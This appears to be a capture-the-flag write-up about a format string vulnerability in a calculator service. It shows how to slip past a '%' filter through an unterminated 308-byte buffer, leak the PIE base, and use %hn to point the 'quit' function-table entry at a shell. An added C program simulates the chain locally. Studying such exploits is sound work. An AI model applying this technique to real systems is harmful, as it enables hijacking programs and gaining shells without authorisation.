I almost forgot how to use a format string vulnerability attack......
After connecting to the server, we get a message like this:
Welcome to Multipurpose Calculation Machine!
[add] Choose the number of parameters: 1
[add] Provide parameter 1: 1
[add] Message of the day: Don't cry because it's over, smile because it happened. -- Dr. Seuss, operands: 
[add] The sum of provided numbers is 1
Except for the menu choice, the program reads every user input with
scanf("%u"), so there is no buffer overflow with which to overwrite memory. For each choice, the program calls
printf(format) to print the "Message of the day" and the "operands". The
format buffer is 308 bytes long, and before printing the program runs a for loop over those 308 bytes and checks whether any of them is a
% character. That seems to prevent a format string attack. However, if the total length of "Message of the day" + "operands" + the rest is greater than 308, the terminating
\0 of the string gets overwritten, so printf keeps reading past the end of the buffer. Luckily, the buffer that receives the choice sits right behind
format in memory, and the choice is never filtered. Thus we can bypass the filter on the
% symbol by putting the directives in the choice, and use the format string vulnerability from there.
Then we use
%x to leak memory, and notice that the binary is position independent, so ASLR randomizes its base. The leaked pointer lies 0x3b00 bytes past the image base, so we calculate the base by subtracting 0x3b00 from it. Then we use
%n to overwrite memory. I tried to overwrite the return address at first, but it didn't work. I used GDB to trace the program, and it did execute
system('/bin/sh'). However, it didn't open a shell. So I decided to try another way.
The main function dynamically calls the function that maps to each choice through a function table. The function table starts at 0x3b00 (relative to the base). I decided to overwrite the
quit choice; it is at 0x3b80 and its value is 0x1fea. After overwriting it with 0x0d20, we can type
quit and get the shell.
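To make the whole chain concrete, here is an added example written for this post; it is not the challenge's own code. It simulates both the terminator overwrite that carries printf past the filtered 308-byte format buffer into the unfiltered choice buffer, and the two-byte %hn write that swaps the quit entry of the dispatch table for a function that stands in for system("/bin/sh"). Everything the writeup does not state is an assumption and is marked as such in the code: the buffer layout (choice directly after format), a message builder that leaves no room for the terminator, a table with only add and quit, the pointer consumed by %hn being passed explicitly instead of coming off the stack, a little-endian machine, and a target that shares the upper bits of the pointer it replaces.

```c
/* Added example for this writeup, not the challenge binary. Assumptions are
 * marked "assumed" below. Build: cc -O0 demo.c -o demo && ./demo */
#undef _FORTIFY_SOURCE   /* glibc's fortified printf aborts on %n in a writable
                            format string; the CTF binary had no such check */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FMT_LEN 308

/* Assumed layout from the writeup: the choice buffer sits right behind format. */
struct machine {
    char format[FMT_LEN];
    char choice[64];
};

typedef void (*handler_t)(void);

static int shell_spawned = 0;           /* set by win() in place of system("/bin/sh") */
static void do_add(void)  { }
static void do_quit(void) { }
static void win(void)     { shell_spawned = 1; }

/* Assumed dispatch table with only two entries; the real one is bigger. */
enum { CHOICE_ADD = 0, CHOICE_QUIT = 1 };
static handler_t table[] = { do_add, do_quit };

/* Called through a pointer so the fortified inline wrapper (which also rejects
 * %n in writable formats) is bypassed on distributions that enable it. */
static int (*const raw_snprintf)(char *, size_t, const char *, ...) = snprintf;

/* The filter as described: scan exactly FMT_LEN bytes for '%'. It never asks
 * whether a terminator is present inside those bytes. */
static int format_is_clean(const struct machine *m) {
    for (int i = 0; i < FMT_LEN; i++)
        if (m->format[i] == '%') return 0;
    return 1;
}

/* The check the filter is missing. */
static int format_is_terminated(const struct machine *m) {
    return memchr(m->format, '\0', FMT_LEN) != NULL;
}

/* Assumed builder: copies the message into format, truncating to FMT_LEN.
 * A 308-byte message leaves no room for the terminator. */
static void set_message(struct machine *m, const char *motd) {
    size_t n = strlen(motd);
    if (n > FMT_LEN) n = FMT_LEN;
    memcpy(m->format, motd, n);
    if (n < FMT_LEN) m->format[n] = '\0';
}

/* The vulnerable printf(format). In the real program the pointer consumed by
 * %hn comes off the stack; here it is passed explicitly to keep the demo defined. */
static int vulnerable_print(const struct machine *m, short *stack_arg) {
    static char sink[1 << 17];           /* large enough that nothing is truncated */
    return raw_snprintf(sink, sizeof sink, m->format, 'A', stack_arg);
}

/* main()'s dispatch: index the table and call through it. */
static void dispatch(int choice) { table[choice](); }

/* Normal session: a message containing '%' is caught, a short message keeps
 * its terminator, and "add" runs do_add. Returns 1 when all of that holds. */
static int normal_session(void) {
    struct machine m;
    memset(&m, 0, sizeof m);
    set_message(&m, "%x %x %n");
    if (format_is_clean(&m)) return 0;
    set_message(&m, "Don't cry because it's over, smile because it happened.");
    if (!format_is_clean(&m) || !format_is_terminated(&m)) return 0;
    vulnerable_print(&m, NULL);          /* no directives, nothing happens */
    dispatch(CHOICE_ADD);
    return 1;
}

/* Full chain: fill format to 308 bytes (filter passes, '\0' gone), put the
 * %hn payload in choice, let printf run on into it, then pick "quit".
 * Returns 1 when quit lands in win(), negative when an assumption fails. */
static int hijack_quit(void) {
    struct machine m;
    char motd[FMT_LEN + 1];
    memset(&m, 0, sizeof m);
    memset(motd, 'A', FMT_LEN);
    motd[FMT_LEN] = '\0';
    set_message(&m, motd);
    if (!format_is_clean(&m) || format_is_terminated(&m)) return -1;

    uintptr_t target  = (uintptr_t)win;
    uintptr_t current = (uintptr_t)table[CHOICE_QUIT];
    if ((target >> 16) != (current >> 16)) return -2;   /* 2-byte write can't reach */

    /* %hn stores the number of characters printed so far, mod 2^16. The 308
     * message bytes are already counted, so pad with %c up to the low 16 bits
     * of win's address; a width of 0 is impossible, so wrap to 65536 instead. */
    unsigned pad = (unsigned)((target & 0xffff) - FMT_LEN) & 0xffff;
    snprintf(m.choice, sizeof m.choice, "%%%uc%%hn", pad ? pad : 65536u);

    short *low16 = (short *)&table[CHOICE_QUIT];   /* assumed little-endian */
    vulnerable_print(&m, low16);                   /* reads past format into choice */
    dispatch(CHOICE_QUIT);                         /* "quit" now calls win() */
    return shell_spawned;
}

int main(void) {
    printf("normal session ok: %d\n", normal_session());
    printf("quit hijacked:     %d\n", hijack_quit());
    return 0;
}
```

Since %hn writes only the low two bytes, the pad width is derived from the low 16 bits of the target minus the 308 bytes already printed; that is the same partial overwrite the writeup performs when it turns 0x1fea into 0x0d20, and it only works because both addresses share the upper bits of the randomized base.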